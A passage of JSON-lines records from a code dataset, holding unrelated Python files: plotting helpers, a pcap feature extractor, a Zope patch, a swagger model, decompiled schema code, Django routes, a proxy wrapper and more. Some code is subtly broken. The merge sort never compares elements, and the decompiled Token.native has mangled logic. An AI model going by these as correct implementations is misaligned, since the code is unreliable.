\"\"\"\n for i in post_student_data: \n if post_student_data[i] == \"N/A\":\n while True:\n if i == \"scoreTimestamp\":\n post_student_data[i] = int(round(time.time() * 1000))\n break\n data_input = input(f\"Enter {i}: \")\n if data_input == \"-99\":\n break\n if i == \"score\":\n try:\n data_input = float(data_input)\n except ValueError:\n print(\"Value Error: please enter a numeric score.\")\n continue\n post_student_data[i] = data_input\n break\n \n return post_student_data\n\n def ask(self) -> data_input:\n \"\"\"ask user for student data\n pseudo code:\n loop empty_student_data if its not \"N/A\" it will print out its key and value\n then it will call data_input\n Returns:\n data_input: return student data that ready to write\n \"\"\"\n print(\"===========================\")\n post_student_data = self.pre_data\n for i in post_student_data:\n if post_student_data[i] != \"N/A\":\n print(f\"{i}: {post_student_data[i]}\")\n print(\"===========================\")\n post_data = self.data_input(post_student_data)\n return post_data\n","sub_path":"src/main/student_data.py","file_name":"student_data.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"316577981","text":"# plot.py\n# Created by Jaewon Chung on 2018-10-19.\n# Email: j1c@jhu.edu\n# Copyright (c) 2018. All rights reserved.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom ..utils import import_graph, pass_to_ranks\n\n\ndef _check_common_inputs(figsize=None,\n height=None,\n title=None,\n context=None,\n font_scale=None,\n legend_name=None):\n # Handle figsize\n if figsize is not None:\n if not isinstance(figsize, tuple):\n msg = 'figsize must be a tuple, not {}.'.format(type(figsize))\n raise TypeError(msg)\n\n # Handle heights\n if height is not None:\n if not isinstance(height, (int, float)):\n msg = 'height must be an integer or float, not {}.'.format(\n type(height))\n raise TypeError(msg)\n\n # Handle title\n if title is not None:\n if not isinstance(title, str):\n msg = 'title must be a string, not {}.'.format(type(title))\n raise TypeError(msg)\n\n # Handle context\n if context is not None:\n if not isinstance(context, str):\n msg = 'context must be a string, not {}.'.format(type(context))\n raise TypeError(msg)\n elif not context in ['paper', 'notebook', 'talk', 'poster']:\n msg = 'context must be one of (paper, notebook, talk, poster), \\\n not {}.'.format(context)\n raise ValueError(msg)\n\n # Handle font_scale\n if font_scale is not None:\n if not isinstance(font_scale, (int, float)):\n msg = 'font_scale must be an integer or float, not {}.'.format(\n type(font_scale))\n raise TypeError(msg)\n\n # Handle legend name\n if legend_name is not None:\n if not isinstance(legend_name, str):\n msg = 'legend_name must be a string, not {}.'.format(\n type(legend_name))\n raise TypeError(msg)\n\n\ndef _transform(arr, method):\n if method is not None:\n if method == 'log':\n #arr = np.log(arr, where=(arr > 0))\n #hacky, but np.log(arr, where=arr>0) is really buggy\n arr = arr.copy()\n arr[arr > 0] = np.log(arr[arr > 0])\n elif method in ['zero-boost', 'simple-all', 'simple-nonzero']:\n arr = pass_to_ranks(arr, method=method)\n else:\n msg = 'Transform must be one of {log, zero-boost, simple-all, \\\n simple-nonzero, not {}.'.format(method)\n raise ValueError(msg)\n\n return arr\n\n\ndef heatmap(X,\n transform=None,\n figsize=(10, 10),\n title=None,\n context='talk',\n font_scale=1,\n xticklabels=False,\n yticklabels=False,\n cmap='RdBu_r',\n center=0,\n cbar=True):\n r\"\"\"\n Plots a graph as a heatmap.\n\n Parameters\n ----------\n X : nx.Graph or np.ndarray object\n Graph or numpy matrix to plot\n transform : None, or string {'log', 'zero-boost', 'simple-all', 'simple-nonzero'}\n\n - 'log' :\n Plots the log of all nonzero numbers\n - 'zero-boost' :\n Pass to ranks method. preserves the edge weight for all 0s, but ranks \n the other edges as if the ranks of all 0 edges has been assigned. \n - 'simple-all': \n Pass to ranks method. Assigns ranks to all non-zero edges, settling \n ties using the average. Ranks are then scaled by \n :math:`\\frac{2 rank(\\text{non-zero edges})}{n^2 + 1}` \n where n is the number of nodes\n - 'simple-nonzero':\n Pass to ranks method. Aame as simple-all, but ranks are scaled by\n :math:`\\frac{2 rank(\\text{non-zero edges})}{\\text{total non-zero edges} + 1}`\n figsize : tuple of integers, optional, default: (10, 10)\n Width, height in inches.\n title : str, optional, default: None\n Title of plot.\n context : None, or one of {paper, notebook, talk (default), poster}\n The name of a preconfigured set.\n font_scale : float, optional, default: 1\n Separate scaling factor to independently scale the size of the font\n elements.\n xticklabels, yticklabels : bool or list, optional\n If list-like, plot these alternate labels as the ticklabels.\n cmap : str, default: 'RdBu_r'\n Valid matplotlib color map.\n center : float, default: 0\n The value at which to center the colormap\n cbar : bool, default: True\n Whether to draw a colorbar.\n \"\"\"\n _check_common_inputs(\n figsize=figsize, title=title, context=context, font_scale=font_scale)\n\n # Handle ticklabels\n if isinstance(xticklabels, list):\n if len(xticklabels) != X.shape[1]:\n msg = 'xticklabels must have same length {}.'.format(X.shape[1])\n raise ValueError(msg)\n elif not isinstance(xticklabels, bool):\n msg = 'xticklabels must be a bool or a list, not {}'.format(\n type(xticklabels))\n raise TypeError(msg)\n\n if isinstance(yticklabels, list):\n if len(yticklabels) != X.shape[0]:\n msg = 'yticklabels must have same length {}.'.format(X.shape[0])\n raise ValueError(msg)\n elif not isinstance(yticklabels, bool):\n msg = 'yticklabels must be a bool or a list, not {}'.format(\n type(yticklabels))\n raise TypeError(msg)\n\n # Handle cmap\n if not isinstance(cmap, str):\n msg = 'cmap must be a string, not {}.'.format(type(cmap))\n raise TypeError(msg)\n\n # Handle center\n if center is not None:\n if not isinstance(center, (int, float)):\n msg = 'center must be a integer or float, not {}.'.format(\n type(center))\n raise TypeError(msg)\n\n # Handle cbar\n if not isinstance(cbar, bool):\n msg = 'cbar must be a bool, not {}.'.format(type(center))\n raise TypeError(msg)\n\n arr = import_graph(X)\n arr = _transform(arr, transform)\n #arr = _transform(X, transform)\n\n # Global plotting settings\n CBAR_KWS = dict(shrink=0.7)\n\n with sns.plotting_context(context, font_scale=font_scale):\n fig, ax = plt.subplots(figsize=figsize)\n plot = sns.heatmap(\n arr,\n cmap=cmap,\n square=True,\n xticklabels=xticklabels,\n yticklabels=yticklabels,\n cbar_kws=CBAR_KWS,\n center=center,\n cbar=cbar,\n ax=ax)\n if title is not None:\n plot.set_title(title)\n\n return plot\n\n\ndef gridplot(X,\n labels,\n transform=None,\n height=10,\n title=None,\n context='talk',\n font_scale=1,\n alpha=0.7,\n sizes=(10, 200)):\n r\"\"\"\n Plots multiple graphs as a grid, with intensity denoted by the size \n of dots on the grid.\n\n Parameters\n ----------\n X : list of nx.Graph or np.ndarray object\n List of nx.Graph or numpy arrays to plot\n labels : list of str\n List of strings, which are labels for each element in X. \n `len(X) == len(labels)`.\n transform : None, or string {'log', 'zero-boost', 'simple-all', 'simple-nonzero'}\n\n - 'log' :\n Plots the log of all nonzero numbers\n - 'zero-boost' :\n Pass to ranks method. preserves the edge weight for all 0s, but ranks \n the other edges as if the ranks of all 0 edges has been assigned. \n - 'simple-all': \n Pass to ranks method. Assigns ranks to all non-zero edges, settling \n ties using the average. Ranks are then scaled by \n :math:`\\frac{2 rank(\\text{non-zero edges})}{n^2 + 1}` \n where n is the number of nodes\n - 'simple-nonzero':\n Pass to ranks method. Aame as simple-all, but ranks are scaled by\n :math:`\\frac{2 rank(\\text{non-zero edges})}{\\text{total non-zero edges} + 1}`\n height : int, optional, default: 10\n Height of figure in inches.\n title : str, optional, default: None\n Title of plot.\n context : None, or one of {paper, notebook, talk (default), poster}\n The name of a preconfigured set.\n font_scale : float, optional, default: 1\n Separate scaling factor to independently scale the size of the font\n elements.\n \"\"\"\n _check_common_inputs(\n height=height, title=title, context=context, font_scale=font_scale)\n\n if isinstance(X, list):\n graphs = [import_graph(x) for x in X]\n else:\n msg = 'X must be a list, not {}.'.format(type(X))\n raise TypeError(msg)\n\n # Handle labels\n if not isinstance(labels, list):\n msg = 'labels must be a list, not {}.'.format(type(labels))\n raise TypeError(msg)\n elif len(labels) != len(graphs):\n msg = 'Expected {} elements in labels, but got {} instead.'.format(\n len(graphs), len(labels))\n raise ValueError(msg)\n\n graphs = [_transform(arr, transform) for arr in graphs]\n\n palette = sns.color_palette('Set1', desat=0.75, n_colors=len(labels))\n\n dfs = []\n for idx, graph in enumerate(graphs):\n rdx, cdx = np.where(graph > 0)\n weights = graph[(rdx, cdx)]\n df = pd.DataFrame(\n np.vstack([rdx, cdx, weights]).T,\n columns=['rdx', 'cdx','Weights'])\n df['Type'] = [labels[idx]] * len(cdx)\n dfs.append(df)\n\n df = pd.concat(dfs, axis=0)\n\n with sns.plotting_context(context, font_scale=font_scale):\n sns.set_style('white')\n plot = sns.relplot(\n data=df,\n x='cdx',\n y='rdx',\n hue='Type',\n size='Weights',\n sizes=sizes,\n alpha=alpha,\n palette=palette,\n height=height,\n facet_kws={'sharex':True,\n 'sharey':True,\n 'xlim':(0,graph.shape[0]),\n 'ylim':(0,graph.shape[0]),})\n plot.ax.axis('off')\n plot.ax.invert_yaxis()\n if title is not None:\n plot.set(title=title)\n\n return plot\n\n\n\ndef pairplot(X,\n Y=None,\n col_names=None,\n title=None,\n legend_name=None,\n variables=None,\n height=2.5,\n context='talk',\n font_scale=1,\n palette='Set1',\n alpha=0.7):\n r\"\"\"\n Plot pairwise relationships in a dataset.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Input data.\n Y : array-like or list, shape (n_samples), optional\n Labels that correspond to each sample in X.\n col_names : array-like or list, shape (n_features), optional\n Names or labels for each feature in X. If not provided, the default \n will be `Dimension 1, Dimension 2, etc`.\n title : str, optional, default: None\n Title of plot.\n legend_name : str, optional, default: None\n Title of the legend.\n variables : list of variable names, optional\n Variables to plot based on col_names, otherwise use every column with\n a numeric datatype.\n height : int, optional, default: 10\n Height of figure in inches.\n context : None, or one of {paper, notebook, talk (default), poster}\n The name of a preconfigured set.\n font_scale : float, optional, default: 1\n Separate scaling factor to independently scale the size of the font \n elements.\n palette : str, dict, optional, default: 'Set1'\n Set of colors for mapping the `hue` variable. If a dict, keys should\n be values in the hue variable.\n \"\"\"\n _check_common_inputs(\n height=height,\n title=title,\n context=context,\n font_scale=font_scale,\n legend_name=legend_name)\n\n # Handle X\n if not isinstance(X, (list, np.ndarray)):\n msg = 'X must be array-like, not {}.'.format(type(X))\n raise TypeError(msg)\n\n # Handle Y\n if Y is not None:\n if not isinstance(Y, (list, np.ndarray)):\n msg = 'Y must be array-like or list, not {}.'.format(type(Y))\n raise TypeError(msg)\n elif X.shape[0] != len(Y):\n msg = 'Expected length {}, but got length {} instead for Y.'.format(\n X.shape[0], len(Y))\n raise ValueError(msg)\n\n # Handle col_names\n if col_names is None:\n col_names = [\n 'Dimension {}'.format(i) for i in range(1, X.shape[1] + 1)\n ]\n elif not isinstance(col_names, list):\n msg = 'col_names must be a list, not {}.'.format(type(col_names))\n raise TypeError(msg)\n elif X.shape[1] != len(col_names):\n msg = 'Expected length {}, but got length {} instead for col_names.'.format(\n X.shape[1], len(col_names))\n raise ValueError(msg)\n\n # Handle variables\n if variables is not None:\n if len(variables) > len(col_names):\n msg = 'variables cannot contain more elements than col_names.'\n raise ValueError(msg)\n else:\n for v in variables:\n if v not in col_names:\n msg = '{} is not a valid key.'.format(v)\n raise KeyError(msg)\n else:\n variables = col_names\n\n df = pd.DataFrame(X, columns=col_names)\n if Y is not None:\n if legend_name is None:\n legend_name = 'Type'\n df_labels = pd.DataFrame(Y, columns=[legend_name])\n df = pd.concat([df_labels, df], axis=1)\n\n with sns.plotting_context(context=context, font_scale=font_scale):\n if Y is not None:\n pairs = sns.pairplot(\n df,\n hue=legend_name,\n vars=variables,\n height=height,\n palette=palette,\n plot_kws=dict(alpha=alpha))\n else:\n pairs = sns.pairplot(\n df,\n vars=variables,\n height=height,\n palette=palette,\n plot_kws=dict(alpha=alpha))\n pairs.set(xticks=[], yticks=[])\n pairs.fig.subplots_adjust(top=0.945)\n pairs.fig.suptitle(title)\n\n return pairs","sub_path":"graspy/plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":14276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"544447144","text":"import th_en\n\ndef synonym_index(w1, w2):\n \"\"\"\n Tries to find degrees of synonymity between two words\n \n w1: a Word Object\n w2: another Word Object\n \"\"\"\n if w1 not in th_en.thesaurus:\n return 666\n tried = {}\n def find_syn(word, target, depth, max_depth = 4):\n print(\" \"*depth+\"Word:\", word, \"Depth:\", depth)\n if depth >= max_depth:\n return 666\n syns = th_en.thesaurus[word]\n if target in syns:\n return depth\n else:\n returns = []\n # print(\" \"*depth+str(syns))\n for w in syns:\n if w in th_en.thesaurus:\n # if w not in tried:\n # print(\"Trying:\",w,\" at depth\", depth )\n tried[w] = \"1\"\n returns.append(find_syn(w, target, depth + 1))\n return min(returns+[666])\n \n return find_syn(w1, w2, 1)\n \nprint(synonym_index(\"turtle\", \"water\"))","sub_path":"synonyms.py","file_name":"synonyms.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"132331054","text":"# -*- coding: utf-8 -*-\n# extra\n#提取测试集特征\nfrom scapy.all import *\nimport shelve\n\npcap = raw_input(\"Enter pcap file path and name: \")\n#pcap = 'http.pcap'\nfile = rdpcap(pcap)\nlines = len(file)\n#print file\n\nraw_pkt = {}\nfor i in range(lines):\n raw_pkt[i] = file[i]\n\npropertys = {}\nfor i in range(lines):\n try:\n if(raw_pkt[i].proto == 6 or raw_pkt[i].proto == 17):\n if ((raw_pkt[i]['IP'].src =='192.168.64.128') and 'Raw' in raw_pkt[i]):\n #print 'yes'\n propertys[i + 1] = []\n propertys[i + 1].append(str(raw_pkt[i].proto))\n propertys[i + 1].append(str(raw_pkt[i].dport))\n propertys[i + 1].append(raw_pkt[i]['IP'].src)\n except AttributeError:\n continue\n\nprint('Extraction have finished')\nname = raw_input(\"Please use a new file to save it: \")\nsave = shelve.open(name)\nsave['res'] = propertys\nsave.close()","sub_path":"extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650748569","text":"with open('../iwslt/train.tok.bpe.32000.de', 'rt') as input_file:\n with open('../iwslt/train.bpe.idx.mapping.de', 'wt') as output_file:\n for line in input_file.readlines():\n line_list = line.split()\n mapping = []\n new_subwords = []\n for i, w in enumerate(line_list):\n new_subwords.append(i)\n if w[-2:] != '@@':\n mapping.append(new_subwords)\n new_subwords = []\n s = ' '.join([str(i)+':'+','.join([str(n) for n in subwords]) for i, subwords in enumerate(mapping)])\n output_file.write(s + '\\n')","sub_path":"process_files/split_by_subword.py","file_name":"split_by_subword.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156794419","text":"##############################################################################\n#\n# Copyright (c) 2002 Zope Foundation and Contributors.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\"\"\"Patch for Persistent to support IPersistentExtra.\n\n$Id$\n\"\"\"\nfrom DateTime.DateTime import DateTime\n\nclass PersistentUtil:\n\n def bobobase_modification_time(self):\n jar=self._p_jar\n oid=self._p_oid\n if jar is None or oid is None:\n return DateTime()\n\n try:\n t = self._p_mtime\n except:\n t = 0\n return DateTime(t)\n\n\n_patched = False\n\ndef patchPersistent():\n global _patched\n if _patched:\n return\n\n _patched = True\n\n from zope.interface import classImplements\n from Persistence import Persistent\n from App.interfaces import IPersistentExtra\n\n for k, v in PersistentUtil.__dict__.items():\n if k[0] != '_':\n setattr(Persistent, k, v)\n\n classImplements(Persistent, IPersistentExtra)\n","sub_path":"Zope/tags/2.12.22/src/App/PersistentExtra.py","file_name":"PersistentExtra.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472097066","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass Ipv4AddressConfig(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, ip: str=None, prefix_length: str=None): # noqa: E501\n \"\"\"Ipv4AddressConfig - a model defined in Swagger\n\n :param ip: The ip of this Ipv4AddressConfig. # noqa: E501\n :type ip: str\n :param prefix_length: The prefix_length of this Ipv4AddressConfig. # noqa: E501\n :type prefix_length: str\n \"\"\"\n self.swagger_types = {\n 'ip': str,\n 'prefix_length': str\n }\n\n self.attribute_map = {\n 'ip': 'ip',\n 'prefix_length': 'prefixLength'\n }\n\n self._ip = ip\n self._prefix_length = prefix_length\n\n @classmethod\n def from_dict(cls, dikt) -> 'Ipv4AddressConfig':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Ipv4AddressConfig of this Ipv4AddressConfig. # noqa: E501\n :rtype: Ipv4AddressConfig\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def ip(self) -> str:\n \"\"\"Gets the ip of this Ipv4AddressConfig.\n\n The IPv4 address on the interface. # noqa: E501\n\n :return: The ip of this Ipv4AddressConfig.\n :rtype: str\n \"\"\"\n return self._ip\n\n @ip.setter\n def ip(self, ip: str):\n \"\"\"Sets the ip of this Ipv4AddressConfig.\n\n The IPv4 address on the interface. # noqa: E501\n\n :param ip: The ip of this Ipv4AddressConfig.\n :type ip: str\n \"\"\"\n\n self._ip = ip\n\n @property\n def prefix_length(self) -> str:\n \"\"\"Gets the prefix_length of this Ipv4AddressConfig.\n\n The length of the subnet prefix. # noqa: E501\n\n :return: The prefix_length of this Ipv4AddressConfig.\n :rtype: str\n \"\"\"\n return self._prefix_length\n\n @prefix_length.setter\n def prefix_length(self, prefix_length: str):\n \"\"\"Sets the prefix_length of this Ipv4AddressConfig.\n\n The length of the subnet prefix. # noqa: E501\n\n :param prefix_length: The prefix_length of this Ipv4AddressConfig.\n :type prefix_length: str\n \"\"\"\n\n self._prefix_length = prefix_length\n","sub_path":"python-flask/swagger_server/models/ipv4_address_config.py","file_name":"ipv4_address_config.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"37867003","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /marrow/schema/transform/complex.py\n# Compiled at: 2018-12-02 18:39:07\n# Size of source mod 2**32: 4573 bytes\nimport re\nfrom inspect import isroutine\nfrom .base import Concern, Transform, DataAttribute, Attribute\n\nclass TokenPatternAttribute(DataAttribute):\n __doc__ = 'Lazy construction of the regular expression needed for token processing.'\n\n def __get__(self, obj, cls=None):\n if obj is None:\n return self\n try:\n return obj.__data__[self.__name__]\n except KeyError:\n pass\n\n separators = obj.separators\n groups = obj.groups\n quotes = obj.quotes\n if groups:\n if None not in groups:\n groups = [\n None] + list(groups)\n expression = ''.join((\n '[\\\\s%s]*' % (''.join(separators),),\n '(',\n '[%s]%s' % (\n ''.join([i for i in list(groups) if i is not None]), '?' if None in groups else '') if groups else '',\n ''.join(['%s[^%s]+%s|' % (i, i, i) for i in quotes]) if quotes else '',\n '[^%s]+' % (''.join(separators),),\n ')',\n '[%s]*' % (''.join(separators),)))\n value = (\n expression, re.compile(expression))\n self.__set__(obj, value)\n return value\n\n\nclass Token(Transform):\n separators = Attribute(default=' \\t')\n quotes = Attribute(default='\"\\'')\n groups = Attribute(default=[])\n group = Attribute(default=None)\n normalize = Attribute(default=None)\n sort = Attribute(default=False)\n cast = Attribute(default=list)\n pattern = TokenPatternAttribute()\n\n def native(self, value, context=None):\n value = super().native(value, context)\n if value is None:\n return\n pattern, regex = self.pattern\n matches = regex.findall(value)\n if isroutine(self.normalize):\n matches = [self.normalize(i) for i in matches]\n else:\n if self.sort:\n matches.sort()\n return self.groups or self.cast(matches)\n groups = dict([(i, list()) for i in self.groups])\n if None not in groups:\n groups[None] = list()\n for i in matches:\n if i[0] in self.groups:\n groups[i[0]].append(i[1:])\n else:\n groups[None].append(i)\n\n if self.group is dict:\n return groups\n if not self.group:\n results = []\n for group in self.groups:\n results.extend([(group, match) for match in groups[group]])\n\n return self.cast(results)\n return self.group([[match for match in groups[group]] for group in self.groups])\n\n def foreign(self, value, context=None):\n value = super().foreign(value, context)\n if value is None:\n return\n\n def sanatize(keyword):\n if not self.quotes:\n return keyword\n for sep in self.separators:\n if sep in keyword:\n return self.quotes[0] + keyword + self.quotes[0]\n\n return keyword\n\n if self.group is dict:\n if not isinstance(value, dict):\n raise Concern('Dictionary grouped values must be passed as a dictionary.')\n return self.separators[0].join([(prefix or '') + sanatize(keyword) for prefix, keywords in sorted(list(value.items())) for keyword in sorted(value[prefix])])\n if not isinstance(value, (list, tuple, set)):\n raise Concern('Ungrouped values must be passed as a list, tuple, or set.')\n value = [sanatize(keyword) for keyword in value]\n return self.separators[0].join(sorted(value) if self.sort else value)\n\n\ntags = Token(separators=' \\t,', normalize=(lambda s: s.lower().strip('\"')), cast=set)\ntag_search = Token(separators=' \\t,', normalize=(lambda s: s.lower().strip('\"')), cast=set, groups=['+', '-'], group=dict)\nterms = Token(groups=['+', '-'], group=dict)","sub_path":"pycfiles/marrow.schema-2.0.0-py2.py3-none-any/complex.cpython-37.opt-1.py","file_name":"complex.cpython-37.opt-1.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"460323232","text":"from decimal import *\n\nkeywordDict = {}\nresultsDict = {}\n\nclass Edge(object):\n def __init__(self, node, weight = 1):\n self.weight = weight\n self.node = node\n\nclass Node(object):\n def __init__(self, name, baseWeight = 1):\n self.weight = 0\n self.name = name\n self.edges = []\n self.baseWeight = baseWeight\n\n def connect(self, node, edgeWeight):\n self.edges.append(Edge(node, edgeWeight))\n\ndef connectKeywordsToNode(keywordCountDict, node):\n createdNodes = []\n for kw, count in keywordCountDict.items():\n if kw in keywordDict.keys():\n newNode = keywordDict[kw]\n else:\n newNode = Node(kw) # create new node for every keyword\n keywordDict[kw] = newNode\n createdNodes.append(newNode)\n \n newNode.connect(node, count) # connect keyword to method and assign count as edge weight\n return createdNodes\n\ndef connectListToNode(names, node):\n createdNodes = []\n edgeWeight = Decimal(1) / Decimal(len(names))\n for name in names:\n newNode = Node(name)\n newNode.connect(node, edgeWeight)\n createdNodes.append(newNode)\n return createdNodes\n\ndef printGraph(kwDict):\n for kw, kwNode in kwDict.items():\n print(\"kw: \" + kw + \" -- \" + str(kwNode.weight))\n for kwEdge in kwNode.edges:\n print(\" -\" + str(kwEdge.weight) + \"--> \" + kwEdge.node.name + \" -- \" + str(kwEdge.node.weight))\n for childEdge in kwEdge.node.edges:\n print(\" -\" + str(childEdge.weight) + \"--> \" + childEdge.node.name + \" -- \" + str(childEdge.node.weight))\n for infantEdge in childEdge.node.edges:\n print(\" -\" + str(infantEdge.weight) + \"--> \" + infantEdge.node.name + \" -- \" + str(infantEdge.node.weight))\n if len(infantEdge.node.edges):\n \" Infant has edges...\"\n\n\nif __name__==\"__main__\":\n repo = { \n \"class1\": {\n \"m0\":{\n \"distance\": 2 , \n \"Add\": 1\n } ,\n \"m1\":{\n \"get\": 2\n }\n } ,\n \"class2\":{\n \"m2\":{\n \"ParticleFilter\": 1\n }\n }\n }\n\n repoNodes = Node(\"repo\")\n \n classNodes = connectListToNode(repo.keys(),repoNodes) \n \n for node in classNodes:\n nodeDict = repo[node.name]\n methodsNodes = connectListToNode(nodeDict.keys(), node)\n \n for method in methodsNodes:\n methodDict = nodeDict[method.name] \n keywordNodes = connectKeywordsToNode(methodDict, method)\n\n printGraph(keywordDict)\n \n\n\n\n\n\n\n\n \n","sub_path":"nodeTools.py","file_name":"nodeTools.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104457111","text":"\"\"\"TAGserver URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import include, path\r\nfrom rest_framework import routers\r\nfrom portalAPP import views\r\nfrom rest_framework.authtoken.views import obtain_auth_token\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nrouter = routers.DefaultRouter()\r\n#router.register(r'Usuario', views.UsuarioViewSet)\r\n#router.register(r'Projeto', views.ProjetoViewSet)\r\n#router.register(r'Noticia', views.NoticiaViewSet)\r\n#router.register(r'Evento', views.EventoViewSet)\r\n\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n path('', include(router.urls)),\r\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\r\n path('login/', views.Login.as_view(), name='login'),\r\n path('Usuario/', views.UsuarioView.as_view(), name='usuario'),\r\n path('Usuario/', views.UsuarioDetalhe.as_view(), name='usuario'),\r\n path('Usuario/', views.UsuarioRegister.as_view(), name='usuario'),\r\n path('Projeto/', views.ProjetoView.as_view(), name='projeto'),\r\n path('Projeto/', views.ProjetoDetalhe.as_view(), name='projeto'),\r\n path('Evento/', views.EventoView.as_view(), name='evento'),\r\n path('Evento/', views.EventoDetalhe.as_view(), name='evento'),\r\n path('Noticia/', views.NoticiaView.as_view(), name='noticia'),\r\n path('Noticia/', views.NoticiaDetalhe.as_view(), name='noticia'),\r\n path('GerarLink/', views.GerarLink.as_view(), name='gerar_link'),\r\n path('AutenticarLink/', views.AutenticarLink.as_view(), name='autenticar_link'),\r\n]\r\n\r\nif settings.DEBUG: # new\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"TAGserver/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119966502","text":"# This file is part of: SST (selenium-simple-test)\n# https://launchpad.net/selenium-simple-test\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport requests\n\nfrom sst import config\nfrom browsermobproxy import Server\n\nlogger = logging.getLogger('SST')\n\nclass Proxy(object):\n\n proxy = None\n proxy_server = None\n test_id = None\n\n def __init__(self, test_id):\n self.test_id = test_id\n self.start_proxy()\n\n def start_proxy(self):\n self.proxy_server = Server(config.proxy_bin)\n self.proxy_server.start()\n self.proxy = self.proxy_server.create_proxy()\n if config.blacklist:\n self.set_blacklist(config.blacklist)\n self.proxy.new_har(self.test_id)\n logger.debug('Browsermob proxy started.')\n return self\n\n def stop_proxy(self):\n filename = '{}.har'.format(self.test_id)\n with open(filename, 'w') as harfile:\n json.dump(self.proxy.har, harfile)\n data = json.dumps(self.proxy.har, ensure_ascii=False)\n self.proxy_server.stop()\n self.proxy = None\n self.proxy_server = None\n logger.debug('Browsermob proxy stopped. HAR created: {}'\n .format(filename))\n\n def set_blacklist(self, domain_list):\n for domain in domain_list:\n self.proxy.blacklist(\"^https?://([a-z0-9-]+[.])*{}*.*\"\n .format(domain), 404)\n logger.debug(\"Proxy blacklist set.\")\n\n def get_blacklist(self):\n return requests.get('{}{}/blacklist'\n .format(config.proxy_api, self.proxy.port))\n","sub_path":"src/sst/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"73166583","text":"from typing import Sequence, TypeVar\n\n_Tt = TypeVar(\"T\")\n\n\ndef sort(container: Sequence[_Tt]) -> Sequence[_Tt]:\n\t\"\"\"Sort input container with merge sort\n\t:param container: container of elements to be sorted\n\t:return: container sorted in ascending order\"\"\"\n\ta = len(container)\n\tif a <= 1:\n\t\treturn container\n\n\tx = sort(container[:a // 2])\n\ty = sort(container[a // 2: a])\n\tj = 0\n\ti = 0\n\tb = []\n\twhile i < len(x) or j < len(y):\n\t\tif not i < len(x):\n\t\t\tb.append(y[j])\n\t\t\tj += 1\n\t\telif not j < len(y):\n\t\t\tb.append(x[i])\n\t\t\ti += 1\n\t\telse:\n\t\t\tb.append(y[j])\n\t\t\tj += 1\n\treturn 